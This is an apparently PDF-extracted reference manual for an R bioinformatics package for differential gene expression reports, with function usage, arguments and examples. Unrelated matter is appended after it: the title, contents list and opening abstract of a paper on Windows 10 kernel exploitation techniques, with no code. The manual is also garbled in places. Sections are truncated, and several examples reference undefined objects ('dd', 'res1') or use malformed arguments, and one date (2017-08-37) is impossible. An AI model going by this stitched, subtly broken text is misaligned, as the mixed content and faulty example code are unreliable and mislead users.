**Examples**
```r
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dds <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
dds <- DESeq(dds)
res <- results(dds)
degMean(res[, 4], counts(dds))
```
metadata_list list data.frames from each element with design experiment. Normally colData output
summarize character column to use to group samples
time character column to use as x-axes in figures
col character column to color samples in figures
scale boolean scale by row expression matrix
mapping data.frame mapping table in case elements use different ID in the row.names of expression matrix. For instance, when integrating miRNA/mRNA.
Value
A data.frame with information on what genes are in each cluster in all data set, and the correlation value for each pair cluster comparison.
degMV
Correlation of the standard desviation and the mean of the abundance of a set of genes.
Description
Correlation of the standard desviation and the mean of the abundance of a set of genes.
Usage
degMV(group, pvalues, counts, sign = 0.01)
Arguments
group Character vector with group name for each sample in the same order than counts column names.
pvalues pvalues of DEG analysis.
counts Matrix with counts for each samples and each gene.
sign Defining the cutoff to label significant features. row number should be the same length than pvalues vector.
Value
ggplot2 object
Examples
```r
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dds <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx, ], design=~group)
dds <- DESeq(dds)
res <- results(dds)
degMV(colData(dds)[["group"]],
res[, 4],
counts(dds, normalized = TRUE))
```
degObj
Create a deg object that can be used to plot expression values at shiny server:runGist(9930881)
Description
Create a deg object that can be used to plot expression values at shiny server:runGist(9930881)
Usage
```r
degObj(counts, design, outfile)
```
Arguments
- **counts**: Output from `get_rank` function.
- **design**: Colour used for each gene.
- **outfile**: File that will contain the object.
Value
R object to be load into vizExp.
Examples
```r
data(humanGender)
library(SummarizedExperiment)
degObj(assays(humanGender)[[1]], colData(humanGender), NULL)
```
degPatterns
Make groups of genes using expression profile.
Description
Note that this function doesn’t calculate significant difference between groups, so the matrix used as input should be already filtered to contain only genes that are significantly different or the most interesting genes to study.
Usage
degPatterns(
ma, metadata,
minc = 15,
summarize = "merge",
time = "time",
col = NULL,
consensusCluster = FALSE,
reduce = FALSE,
cutoff = 0.7,
scale = TRUE,
pattern = NULL,
groupDifference = NULL,
eachStep = FALSE,
plot = TRUE,
fixy = NULL,
nClusters = NULL
)
Arguments
ma log2 normalized count matrix
metadata data frame with sample information. Rownames should match ma column names
row number should be the same length than p-values vector.
minc integer minimum number of genes in a group that will be return
summarize character column name in metadata that will be used to group replicates. If the column doesn’t exist it’ll merge the time and the col columns, if col doesn’t exist it’ll use time only. For instance, a merge between summarize and time parameters: control_point0 ... etc
time character column name in metadata that will be used as variable that changes, normally a time variable.
col character column name in metadata to separate samples. Normally control/mutant
consensusCluster Indicates whether using ConsensusClusterPlus or cluster::diana()
**degPatterns**
- **reduce**: boolean remove genes that are outliers of the cluster distribution. boxplot function is used to flag a gene in any group defined by time and col as outlier and it is removed from the cluster. Not used if consensusCluster is TRUE.
- **cutoff**: This is deprecated.
- **scale**: boolean scale the ma values by row
- **pattern**: numeric vector to be used to find patterns like this from the count matrix. As well, it can be a character indicating the genes inside the count matrix to be used as reference.
- **groupDifference**: Minimum abundance difference between the maximum value and minimum value for each feature. Please, provide the value in the same range than the ma value (if ma is in log2, groupDifference should be inside that range).
- **eachStep**: Whether apply groupDifference at each stem over time variable. **This only work properly for one group with multiple time points.**
- **plot**: boolean plot the clusters found
- **fixy**: vector integers used as ylim in plot
- **nClusters**: an integer scalar or vector with the desired number of groups
**Details**
It can work with one or more groups with 2 or more several time points. Before calculating the genes similarity among samples, all samples inside the same time point (time parameter) and group (col parameter) are collapsed together, and the mean value is the representation of the group for the gene abundance. Then, all pair-wise gene expression is calculated using cor.test R function using kendall as the statistical method. A distance matrix is created from those values. After that, cluster::diana() is used for the clustering of gene-gene distance matrix and cut the tree using the divisive coefficient of the clustering, giving as well by diana. Alternatively, if consensusCluster is on, it would use ConsensusClusterPlus to cut the tree in stable clusters. Finally, for each group of genes, only the ones that have genes higher than minc parameter will be added to the figure. The y-axis in the figure is the results of applying scale() R function, what is similar to creating a Z-score where values are centered to the mean and scaled to the standard desviation by each gene.
The different patterns can be merged to get similar ones into only one pattern. The expression correlation of the patterns will be used to decide whether some need to be merged or not.
**Value**
- list with two items:
- df is a data.frame with two columns. The first one with genes, the second with the clusters they belong.
- pass is a vector of the clusters that pass the minc cutoff.
- plot ggplot figure.
- hr clustering of the genes in hclust format.
- profile normalized count data used in the plot.
• raw data.frame with gene values summarized by biological replicates and with metadata information attached.
• summarise data.frame with clusters values summarized by group and with the metadata information attached.
• normalized data.frame with the clusters values as used in the plot.
• benchmarking plot showing the different patterns at different values for clustering cuttree function.
• benchmarking_curve plot showing how the numbers of clusters and genes changed at different values for clustering cuttree function.
Examples
data(humanGender)
library(SummarizedExperiment)
library(ggplot2)
ma <- assays(humanGender)[[1]][1:100,
des <- colData(humanGender)
des[["other"]]<- sample(c("a", "b"), 85, replace = TRUE)
res <- degPatterns(ma, des, time="group", col = "other")
# Use the data yourself for custom figures
ggplot(res[["normalized"]],
aes(group, value, color = other, fill = other)) +
geom_boxplot() +
geom_point(position = position_jitterdodge(dodge.width = 0.9)) +
# change the method to make it smoother
geom_smooth(aes(group=other), method = "lm")
---
degPCA
smart PCA from count matrix data
Description
nice plot using ggplot2 from prcomp function
Usage
degPCA(
counts,
metadata = NULL,
condition = NULL,
pc1 = "PC1",
pc2 = "PC2",
name = NULL,
shape = NULL,
data = FALSE
)
Arguments
- **counts**: matrix with count data
- **metadata**: data.frame with sample information
- **condition**: character column in metadata to use to color samples
- **pc1**: character PC to plot on x-axis
- **pc2**: character PC to plot on y-axis
- **name**: character if given, column in metadata to print label
- **shape**: character if given, column in metadata to shape points
- **data**: Whether return PCA data or just plot the PCA.
Value
if results <- used, the function return the output of **prcomp()**.
Author(s)
Lorena Pantano, Rory Kirchner, Michael Steinbaugh
Examples
```r
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dse <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
degPCA(log2(counts(dse)+0.5), colData(dse),
condition="group", name="group", shape="group")
```
Description
Plot top genes allowing more variables to color and shape points
Usage
```r
degPlot(
dds,
xs,
res = NULL,
n = 9,
genes = NULL,
group = NULL,
batch = NULL,
)```
```r
degPlot = function(dds, xs, res, n, genes, group, batch, metadata = NULL,
ann = c("geneID", "symbol"),
slot = 1L,
log2 = TRUE,
xsLab = xs,
ysLab = "abundance",
color = "black",
groupLab = group,
batchLab = batch,
sizePoint = 1)
```
**Arguments**
- **dds**: `DESeq2::DESeqDataSet` object or `SummarizedExperiment` or `Matrix` or `data.frame`. In case of a `DESeqDataSet` object, always the normalized expression will be used from `counts(dds, normalized = TRUE)`.
- **xs**: Character, colname in `colData` that will be used as X-axes.
- **res**: `DESeq2::DESeqResults` object.
- **n**: Integer number of genes to plot from the `res` object. It will take the top N using `padj` values to order the table.
- **genes**: Character of gene names matching rownames of count data.
- **group**: Character, colname in `colData` to color points and add different lines for each level.
- **batch**: Character, colname in `colData` to shape points, normally used by batch effect visualization.
- **metadata**: Metadata in case `dds` is a matrix.
- **ann**: Columns in `rowData` (if available) used to print gene names. First element in the vector is the column name in `rowData` that matches the row.names of the `dds` or `count` object. Second element in the vector is the column name in `rowData` that will be used as the title for each gene or feature figure.
- **slot**: Name of the slot to use to get count data.
- **log2**: Whether to apply or not log2 transformation.
- **xsLab**: Character, alternative label for x-axis (default: same as `xs`)
- **ysLab**: Character, alternative label for y-axis.
- **color**: Color to use to plot groups. It can be one color, or a palette compatible with `ggplot2::scale_color_brewer()`.
- **groupLab**: Character, alternative label for group (default: same as `group`).
- **batchLab**: Character, alternative label for batch (default: same as `batch`).
- **sizePoint**: Integer, indicates the size of the plotted points (default 1).
**Value**
`ggplot` showing the expression of the genes
Examples
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dse <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
dse <- DESeq(dse)
degPlot(dse, genes = rownames(dse)[1:10], xs = "group")
degPlot(dse, genes = rownames(dse)[1:10], xs = "group", color = "orange")
degPlot(dse, genes = rownames(dse)[1:10], xs = "group", group = "group",
color = "Accent")
degPlotCluster
Plot clusters from degPattern function output
Description
This function helps to format the cluster plots from degPatterns(). It allows to control the layers and it returns a ggplot object that can accept more ggplot functions to allow customization.
Usage
degPlotCluster(
table,
time,
color = NULL,
min_genes = 10,
process = FALSE,
points = TRUE,
boxes = TRUE,
smooth = TRUE,
lines = TRUE,
facet = TRUE,
cluster_column = "cluster",
prefix_title = "Group:"
)
Arguments
- **table**: normalized element from degPatterns() output. It can be a data.frame with the following columns in there: genes, sample, expression, cluster, xaxis_column, color_column
- **time**: column name to use in the x-axis.
- **color**: column name to use to color and divide the samples.
- **min_genes**: minimum number of genes to be added to the plot.
- **process**: whether to process the table if it is not ready for plotting.
- **points**: Add points to the plot.
degPlotWide
Plot selected genes on a wide format
Description
Plot selected genes on a wide format
Usage
degPlotWide(counts, genes, group, metadata = NULL, batch = NULL)
Arguments
counts: DESeq2::DESeqDataSet object or expression matrix.
genes: character genes to plot.
group: character, colname in colData to color points and add different lines for each level.
metadata: data.frame, information for each sample. Not needed if DESeq2::DESeqDataSet given as counts.
batch: character, colname in colData to shape points, normally used by batch effect visualization.
Value
ggplot showing the expression of the genes on the x axis.
Examples
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dse <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
dse <- DESeq(dse)
degPlotWide(dse, rownames(dse)[1:10], group = "group")
Description
This function joins the output of degMean, degVar and degMV in a single plot. See these functions for further information.
Usage
degQC(counts, groups, object = NULL, pvalue = NULL)
Arguments
counts: Matrix with counts for each samples and each gene.
groups: Character vector with group name for each sample in the same order than counts column names.
object: DEGSet oobject.
pvalue: pvalues of DEG analysis.
degResults
Value
ggplot2 object
Examples
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dds <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
dds <- DESeq(dds)
res <- results(dds)
degQC(counts(dds, normalized=TRUE), colData(dds)["group"],
pvalue = res["pvalue"])
degResults
Complete report from DESeq2 analysis
Description
Complete report from DESeq2 analysis
Usage
degResults(
res = NULL,
dds,
rlogMat = NULL,
name,
org = NULL,
FDR = 0.05,
do_go = FALSE,
FC = 0.1,
group = "condition",
xs = "time",
path_results = ".",
contrast = NULL
)
Arguments
res output from DESeq2::results() function.
dds DESeq2::DESeqDataSet() object.
rlogMat matrix from DESeq2::rlog() function.
name string to identify results
org an organism annotation object, like org.Mm.eg.db. NULL if you want to skip this step.
FDR int cutoff for false discovery rate.
do_go boolean if GO enrichment is done.
FC int cutoff for log2 fold change.
group string column name in colData(dds) that separates samples in meaningful groups.
xs string column name in colData(dss) that will be used as X axes in plots (i.e. time).
path_results character path where files are stored. NULL if you don’t want to save any file.
contrast list with character vector indicating the fold change values from different comparisons to add to the output table.
Value
ggplot2 object
Examples
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dse <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design="group")
dse <- DESeq(dse)
res <- degResults(dds = dse, name = "test", org = NULL,
do_go = FALSE, group = "group", xs = "group", path_results = NULL)
Description
S4 class to store data from differentially expression analysis. It should be compatible with different package and stores the information in a way the methods will work with all of them.
Usage
DEGSet(resList, default)
DEGSet(resList, default)
as.DEGSet(object, ...)
## S4 method for signature 'TopTags'
as.DEGSet(object, default = "raw", extras = NULL)
## S4 method for signature 'data.frame'
as.DEGSet(object, contrast, default = "raw", extras = NULL)
## S4 method for signature 'DESeqResults'
as.DEGSet(object, default = "shrunken", extras = NULL)
**Arguments**
- **resList**
List with results as elements containing log2FoldChange, pvalues and padj as column. Rownames should be feature names. Elements should have names.
- **default**
The name of the element to use by default.
- **object**
Different objects to be transformed to DEGSet when using `as.DEGSet`.
- **...**
Optional parameters of the generic.
- **extras**
List of extra tables related to the same comparison when using `as.DEGSet`.
- **contrast**
To name the comparison when using `as.DEGSet`.
**Details**
For now supporting only `DESeq2::results()` output. Use constructor `degComps()` to create the object.
The list will contain one element for each comparison done. Each element has the following structure:
- **DEG table**
- Optional table with shrunk Fold Change when it has been done.
To access the raw table use `deg(dgs, "raw")`, to access the shrunk table use `deg(dgs, "shrunk")` or just `deg(dgs)`.
**Author(s)**
Lorena Pantano
**Examples**
```r
library(DESeq2)
library(edgeR)
library(limma)
dds <- makeExampleDESeqDataSet(betaSD = 1)
colData(dds)[["treatment"]]<- sample(colData(dds)[["condition"]], 12)
design(dds) <- ~ condition + treatment
dds <- DESeq(dds)
res <- degComps(dds, combs = c("condition"))
deg(res)
deg(res, tidy = "tibble")
# From edgeR
dge <- DGEList(counts=counts(dds), group=colData(dds)[["treatment"]])
dge <- estimateCommonDisp(dge)
res <- as.DEGSet(topTags(exactTest(dge)))
# From limma
v <- voom(counts(dds), model.matrix(~treatment, colData(dds)), plot=FALSE)
fit <- lmFit(v)
fit <- eBayes(fit, robust=TRUE)
res <- as.DEGSet(topTable(fit, n = "Inf"), "A_vs_B")
```
degSignature
Plot gene signature for each group and signature
Description
Given a list of genes belonging to different classes, like markers, plot for each group, the expression values for all the samples.
Usage
```r
defSignture(
counts,
signature,
group = NULL,
metadata = NULL,
slot = 1,
scale = FALSE
)
```
Arguments
- **counts**: expression data. It accepts bcbioRNASeq, DESeqDataSet and SummarizedExperiment. As well, data.frame or matrix is supported, but it requires metadata in that case.
- **signature**: data.frame with two columns: a) genes that match row.names of counts, b) label to classify the gene inside a group. Normally, cell tissue name.
- **group**: character in metadata used to split data into different groups.
- **metadata**: data frame with sample information. Rownames should match ma column names row number should be the same length than p-values vector.
- **slot**: slotName in the case of SummarizedExperiment objects.
- **scale**: Whether to scale or not the expression.
Value
ggplot plot.
Examples
```r
data(humanGender)
data(geneInfo)
degSignature(humanGender, geneInfo, group = "group")
```
degSummary
Print Summary Statistics of Alpha Level Cutoffs
Description
Print Summary Statistics of Alpha Level Cutoffs
Usage
degSummary(
object,
alpha = c(0.1, 0.05, 0.01),
contrast = NULL,
caption = "",
kable = FALSE
)
Arguments
object Can be DEGSet or DESeqDataSet or DESeqResults.
alpha Numeric vector of desired alpha cutoffs.
contrast Character vector to use with results() function.
caption Character vector to add as caption to the table.
kable Whether return a knitr::kable() output. Default is data.frame.
Value
data.frame or knitr::kable().
Author(s)
Lorena Pantano
References
• original idea of multiple alpha values and code syntax from Michael Steinbaugh.
Examples
library(DESeq2)
data(humanGender)
idx <- c(1:5, 75:80)
counts <- assays(humanGender)[[1]]
dse <- DESeqDataSetFromMatrix(counts[1:1000, idx],
colData(humanGender)[idx,],
design = ~group)
dse <- DESeq(dse)
degVar <- results(dse)
res2 <- degComps(dse, contrast = c("group_Male_vs_Female"))
degSummary(dse, contrast = "group_Male_vs_Female")
degSummary(res1)
degSummary(res1, kable = TRUE)
degSummary(res2[[1]])
---
degVar
**Distribution of pvalues by standard desviation range**
**Description**
This function pot the p-valyes distribution colored by the quantiles of the standard desviation of count data.
**Usage**
degVar(pvalues, counts)
**Arguments**
- `pvalues`: pvalues of DEG analysis
- `counts`: Matrix with counts for each samples and each gene. row number should be the same length than pvalues vector.
**Value**
ggplot2 object
**Examples**
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dds <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=~group)
dds <- DESeq(dd)
res <- results(dd)
degVar(res[, 4], counts(dd))
degVB
Description
Distribution of the standard desviation of DE genes compared to the background
Usage
degVB(tags, group, counts, pop = 400)
Arguments
tag List of genes that are DE.
group Character vector with group name for each sample in the same order than counts column names.
counts matrix with counts for each samples and each gene. Should be same length than pvalues vector.
pop Number of random samples taken for background comparison.
Value
ggplot2 object
Examples
data(humanGender)
library(DESeq2)
idx <- c(1:10, 75:85)
dds <- DESeqDataSetFromMatrix(assays(humanGender)[[1]][1:1000, idx],
colData(humanGender)[idx,], design=group)
dds <- DESeq(dds)
res <- results(dds)
degVB(row.names(res)[1:20], colData(dds)["group"],
counts(dds, normalized = TRUE))
degVolcano
Description
Create volcano plot from log2FC and adjusted pvalues data frame
Usage
degVolcano(
stats,
side = "both",
title = "Volcano Plot with Marginal Distributions",
pval.cutoff = 0.05,
lfc.cutoff = 1,
shade.colour = "orange",
shade.alpha = 0.25,
point.colour = "gray",
point.alpha = 0.75,
point.outline.colour = "darkgray",
line.colour = "gray",
plot_text = NULL
)
Arguments
stats data.frame with two columns: logFC and Adjusted.Pvalue
side plot UP, DOWN or BOTH de-regulated points
title title for the figure
pval.cutoff cutoff for the adjusted pvalue. Default 0.05
lfc.cutoff cutoff for the log2FC. Default 1
shade.colour background color. Default orange.
shade.alpha transparency value. Default 0.25
point.colour colours for points. Default gray
point.alpha transparency for points. Default 0.75
point.outline.colour
Default darkgray
line.colour Default gray
plot_text data.frame with three columns: logFC, Pvalue, Gene name
Details
This function was mainly developed by @jnhutchinson.
Value
The function will plot volcano plot together with density of the fold change and p-values on the top
and the right side of the volcano plot.
Author(s)
Lorena Pantano, John Hutchinson
Examples
```r
library(DESeq2)
dds <- makeExampleDESeqDataSet(betaSD = 1)
dds <- DESeq(dds)
stats <- results(dds)[,c("log2FoldChange", "padj")]
stats[["name"]]<- row.names(stats)
degVolcano(stats, plot_text = stats[1:10,])
```
geneInfo
- **data.frame with chromosome information for each gene**
Description
data.frame with chromosome information for each gene
Usage
data(geneInfo)
Format
data.frame
Author(s)
Lorena Pantano, 2014-08-14
Source
biomart
geom_cor
*Add correlation and p-value to a ggplot2 plot*
Description
`geom_cor` will add the correlation, method and p-value to the plot automatically guessing the position if nothing else specified. Family font, size and colour can be used to change the format.
Usage
```r
geom_cor(
mapping = NULL,
data = NULL,
method = "spearman",
xpos = NULL,
ypos = NULL,
inherit.aes = TRUE,
...)
```
Arguments
- **mapping**: Set of aesthetic mappings created by `aes()` or `aes()`. If specified and `inherit.aes` = TRUE (the default), it is combined with the default mapping at the top level of the plot. You must supply `mapping` if there is no plot mapping.
- **data**: The data to be displayed in this layer. There are three options:
- If `NULL`, the default, the data is inherited from the plot data as specified in the call to `ggplot()`.
- A `data.frame`, or other object, will override the plot data. All objects will be fortified to produce a data frame. See `fortify()` for which variables will be created.
- A function will be called with a single argument, the plot data. The return value must be a `data.frame`, and will be used as the layer data.
- **method**: Method to calculate the correlation. Values are passed to `cor.test()` (Spearman, Pearson, Kendall).
- **xpos**: Locate text at that position on the x axis.
- **ypos**: Locate text at that position on the y axis.
- **inherit.aes**: If FALSE, overrides the default aesthetics, rather than combining with them. This is most useful for helper functions that define both data and aesthetics and shouldn’t inherit behaviour from the default plot specification, e.g. `borders()`.
- **...**: other arguments passed on to `layer()`. These are often aesthetics, used to set an aesthetic to a fixed value, like `color = "red"` or `size = 3`. They may also be parameters to the paired geom/stat.
Details
It was integrated after reading this tutorial to extend ggplot2 layers
See Also
`ggplot2::layer()`
humanGender
Examples
data(humanGender)
library(SummarizedExperiment)
library(ggplot2)
ggplot(as.data.frame(assay(humanGender)[1:1000,]),
aes(x = NA20502, y = NA20504)) +
geom_point() +
ylim(0,1.1e5) +
geom_cor(method = "kendall", ypos = 1e5)
humanGender
DGEList object for DE genes between Male and Females
Description
DGEList object for DE genes between Male and Females
Usage
data(humanGender)
Format
DGEList
Author(s)
Lorena Pantano, 2017-08-37
Source
gEUvadis
significants
Method to get the significant genes
Description
Function to get the features that are significant according to some thresholds from a DEGSet, DESeq2::DESeqResults and edgeR::topTags.
significants
Usage
significants(object, padj = 0.05, fc = 0, direction = NULL, full = FALSE, ...)
## S4 method for signature 'DEGSet'
significants(object, padj = 0.05, fc = 0, direction = NULL, full = FALSE, ...)
## S4 method for signature 'DESeqResults'
significants(object, padj = 0.05, fc = 0, direction = NULL, full = FALSE, ...)
## S4 method for signature 'TopTags'
significants(object, padj = 0.05, fc = 0, direction = NULL, full = FALSE, ...)
## S4 method for signature 'list'
significants(
object,
padj = 0.05,
fc = 0,
direction = NULL,
full = FALSE,
newFDR = FALSE,
...
)
Arguments
object DEGSet
padj Cutoff for the FDR column.
fc Cutoff for the log2FC column.
direction Whether to take down/up/ignore. Valid arguments are down, up and NULL.
full Whether to return full table or not.
... Passed to deg. Default: value = NULL. Value can be 'raw', 'shrunken'.
newFDR Whether to recalculate the FDR or not. See https://support.bioconductor.org/p/104059/#104072. Only used when a list is giving to the method.
Value
da dplyr::tbl_df data frame. gene column has the feature name. In the case of using this method with the results from degComps, log2FoldChange has the higher foldChange from the comparisons, and padj has the padj associated to the previous column. Then, there is two columns for each comparison, one for the log2FoldChange and another for the padj.
Author(s)
Lorena Pantano
Examples
```r
library(DESeq2)
dds <- makeExampleDESeqDataSet(betaSD=1)
colData(dds)[["treatment"]]
<- sample(colData(dds)[["condition"]], 12)
design(dds) <- ~ condition + treatment
res <- degComps(dds, contrast = list("treatment_B_vs_A",
c("condition", "A", "B")))
significants(res, full = TRUE)
# significants(res, full = TRUE, padj = 1) # all genes
```
Index
aes(), 36
aes_(), 36
as.DEGSet (DEGSet), 28
as.DEGSet, data.frame-method (DEGSet), 28
as.DEGSet, DESeqResults-method (DEGSet), 28
as.DEGSet, TopTags-method (DEGSet), 28
borders(), 36
cluster::diana(), 19, 20
ComplexHeatmap::Heatmap(), 8
ComplexHeatmap::HeatmapAnnotation(), 6
ConsensusClusterPlus, 19, 20
cor.test(), 36
createReport, 4
data.frame, 31
deg, 4, 38
deg,DEGSet-method (deg), 4
degCheckFactors, 5
degColors, 6
degComps, 7, 38
degComps(), 29
degCorCov, 8
degCorCov(), 10
degCorrect (degDefault), 11
degCorrect,DEGSet-method (degDefault), 11
degCovariates, 9
degDefault, 11
degDefault,DEGSet-method (degDefault), 11
degFilter, 12
degMA, 13
degMB, 14
degMDS, 15
degMean, 15, 26
degMerge, 16
degMV, 17, 26
degObj, 18
degPatterns, 16, 19
degPatterns(), 24
degPCA, 21
degPlot, 22
degPlotCluster, 24
degPlotWide, 25
degQC, 26
DEGreport (DEGreport-package), 3
DEGreport-package, 3
degResults, 27
DEGSet, 5, 8, 12, 13, 26, 28, 31, 37, 38
DEGSet-class (DEGSet), 28
degSignature, 30
degSummary, 31
degVar, 26, 32
degVB, 33
degVolcano, 33
DESeq2::DESeqDataSet, 7, 23, 26
DESeq2::DESeqDataSet(), 27
DESeq2::DESeqResults, 23, 37
DESeq2::estimateSizeFactorsForMatrix(), 6
DESeq2::lfcShrink(), 7
DESeq2::results(), 7, 27, 29
DESeq2::rlog(), 27
DESeqDataSet, 31
DESeqResults, 31
dplyr::tbl_df, 38
dgeR::topTags, 37
fortify(), 36
geneInfo, 35
gem.cor, 35
ggplot, 13
ggplot(), 36
ggplot2, 25, 35
ggplot2::layer(), 36
humanGender, 37
knitr::kable(), 31
layer(), 36
prcomp(), 22
results(), 31
significants, 37
significants, DEGSet-method (significants), 37
significants, DESeqResults-method (significants), 37
significants, list-method (significants), 37
significants, TopTags-method (significants), 37
|
{"Source-Url": "https://www.bioconductor.org/packages/release/bioc/manuals/DEGreport/man/DEGreport.pdf", "len_cl100k_base": 13362, "olmocr-version": "0.1.53", "pdf-total-pages": 41, "total-fallback-pages": 0, "total-input-tokens": 80839, "total-output-tokens": 16421, "length": "2e13", "weborganizer": {"__label__adult": 0.0003643035888671875, "__label__art_design": 0.0011730194091796875, "__label__crime_law": 0.0002887248992919922, "__label__education_jobs": 0.0012874603271484375, "__label__entertainment": 0.000324249267578125, "__label__fashion_beauty": 0.0001819133758544922, "__label__finance_business": 0.0004057884216308594, "__label__food_dining": 0.00041961669921875, "__label__games": 0.000965118408203125, "__label__hardware": 0.001461029052734375, "__label__health": 0.0005216598510742188, "__label__history": 0.0004627704620361328, "__label__home_hobbies": 0.00023293495178222656, "__label__industrial": 0.0005521774291992188, "__label__literature": 0.0003414154052734375, "__label__politics": 0.0003466606140136719, "__label__religion": 0.0005049705505371094, "__label__science_tech": 0.146240234375, "__label__social_life": 0.000209808349609375, "__label__software": 0.061431884765625, "__label__software_dev": 0.78125, "__label__sports_fitness": 0.0003192424774169922, "__label__transportation": 0.00031638145446777344, "__label__travel": 0.0002529621124267578}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 51805, 0.02637]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 51805, 0.85003]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 51805, 0.6156]], "google_gemma-3-12b-it_contains_pii": [[0, 1269, false], [1269, 3832, null], [3832, 4875, null], [4875, 5872, null], [5872, 7252, null], [7252, 8580, null], [8580, 10138, null], [10138, 11395, null], [11395, 12869, null], [12869, 15918, null], [15918, 17328, null], [17328, 18580, null], [18580, 19497, null], [19497, 20483, null], [20483, 21611, null], [21611, 22558, null], [22558, 23746, null], [23746, 24670, null], [24670, 26095, null], [26095, 28817, null], [28817, 30121, null], [30121, 31176, null], [31176, 33265, null], [33265, 34676, null], [34676, 34850, null], [34850, 36021, null], [36021, 36941, null], [36941, 38372, null], [38372, 40059, null], [40059, 41210, null], [41210, 42121, null], [42121, 43010, null], [43010, 43883, null], [43883, 45147, null], [45147, 45877, null], [45877, 47596, null], [47596, 48274, null], [48274, 49701, null], [49701, 50106, null], [50106, 51522, null], [51522, 51805, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1269, true], [1269, 3832, null], [3832, 4875, null], [4875, 5872, null], [5872, 7252, null], [7252, 8580, null], [8580, 10138, null], [10138, 11395, null], [11395, 12869, null], [12869, 15918, null], [15918, 17328, null], [17328, 18580, null], [18580, 19497, null], [19497, 20483, null], [20483, 21611, null], [21611, 22558, null], [22558, 23746, null], [23746, 24670, null], [24670, 26095, null], [26095, 28817, null], [28817, 30121, null], [30121, 31176, null], [31176, 33265, null], [33265, 34676, null], [34676, 34850, null], [34850, 36021, null], [36021, 36941, null], [36941, 38372, null], [38372, 40059, null], [40059, 41210, null], [41210, 42121, null], [42121, 43010, null], [43010, 43883, null], [43883, 45147, null], [45147, 45877, null], [45877, 47596, null], [47596, 48274, null], [48274, 49701, null], [49701, 50106, null], [50106, 51522, null], [51522, 51805, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 51805, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 51805, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 51805, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 51805, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 51805, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 51805, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 51805, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 51805, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 51805, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 51805, null]], "pdf_page_numbers": [[0, 1269, 1], [1269, 3832, 2], [3832, 4875, 3], [4875, 5872, 4], [5872, 7252, 5], [7252, 8580, 6], [8580, 10138, 7], [10138, 11395, 8], [11395, 12869, 9], [12869, 15918, 10], [15918, 17328, 11], [17328, 18580, 12], [18580, 19497, 13], [19497, 20483, 14], [20483, 21611, 15], [21611, 22558, 16], [22558, 23746, 17], [23746, 24670, 18], [24670, 26095, 19], [26095, 28817, 20], [28817, 30121, 21], [30121, 31176, 22], [31176, 33265, 23], [33265, 34676, 24], [34676, 34850, 25], [34850, 36021, 26], [36021, 36941, 27], [36941, 38372, 28], [38372, 40059, 29], [40059, 41210, 30], [41210, 42121, 31], [42121, 43010, 32], [43010, 43883, 33], [43883, 45147, 34], [45147, 45877, 35], [45877, 47596, 36], [47596, 48274, 37], [48274, 49701, 38], [49701, 50106, 39], [50106, 51522, 40], [51522, 51805, 41]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 51805, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-09
|
2024-12-09
|
e63035795af7f5612e90b018fcbc33b95c200305
|
TAKING WINDOWS 10 KERNEL EXPLOITATION TO THE NEXT LEVEL – LEVERAGING WRITE-WHAT-WHERE VULNERABILITIES IN CREATORS UPDATE
Morten Schenk msc@improsec.com
Contents
Abstract ........................................................................................................................................... 2
Background and Windows Kernel Exploitation History .............................................................. 3
Kernel Read and Write Primitives ............................................................................................... 4
Windows 10 Mitigations .............................................................................................................. 7
Windows 10 1607 Mitigations .................................................................................................. 8
Revival of Kernel Read and Write Primitives ........................................................................... 8
Windows 10 1703 Mitigations .................................................................................................. 12
Revival of Kernel Read and Write Primitives Take 2 .............................................................. 14
Kernel ASLR Bypass ................................................................................................................. 17
Dynamic Function Location ..................................................................................................... 22
Page Table Randomization ..................................................................................................... 23
Executable Memory Allocation ................................................................................................. 25
Abstract
Microsoft has put significant effort into mitigating and increasing the difficulty in exploiting vulnerabilities in Windows 10, this also applies for kernel exploits and greatly raises the bar. Most kernel exploits today require a kernel-mode read and write primitive along with a KASLR bypass. Windows 10 Anniversary Update and Creators Update has mitigated and broken most known techniques.
